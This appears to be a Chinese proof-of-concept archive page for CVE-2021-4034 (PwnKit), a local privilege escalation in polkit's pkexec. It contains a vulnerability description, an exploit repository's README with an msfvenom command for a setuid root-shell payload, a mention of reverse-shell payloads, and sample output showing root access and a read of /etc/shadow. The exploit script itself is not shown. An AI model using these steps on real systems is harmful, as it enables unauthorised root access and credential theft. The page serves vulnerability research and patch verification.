关联漏洞
标题:
polkit 缓冲区错误漏洞
(CVE-2021-4034)
描述:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 的 pkexec application存在缓冲区错误漏洞,攻击者可利用该漏洞通过精心设计环境变量诱导pkexec执行任意代码。成功执行攻击后,如果目标计算机上没有权限的用户拥有管理权限,攻击可能会导致本地权限升级。
描述
Python exploit code for CVE-2021-4034 (pwnkit)
介绍
Python3 code to exploit
[CVE-2021-4034](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
[(PWNKIT)](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt).
This was an exercise in "can I make this work in Python?", and not meant
as a robust exploit. It Works For Me, there are problaby bugs.
The default payload starts a shell as `root`, generated from `msfvenom`:
```
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
```
I've tested `linux/x64/shell_reverse_tcp` as well. Make sure you include
the `PrependSetuid=true` argument to `msfvenom`, otherwise you'll just get
a shell as the user and not root.
The code is cribbed from [blasty](https://twitter.com/bl4sty), the orginal is
available [here](https://haxx.in/files/blasty-vs-pkexec.c)
``` shell-session
$ python CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#
```
文件快照
[4.0K] /data/pocs/5a38758666d3d03b56dce37b261e6822ec895e3a
├── [3.2K] CVE-2021-4034.py
├── [6.9K] LICENSE
└── [1.3K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。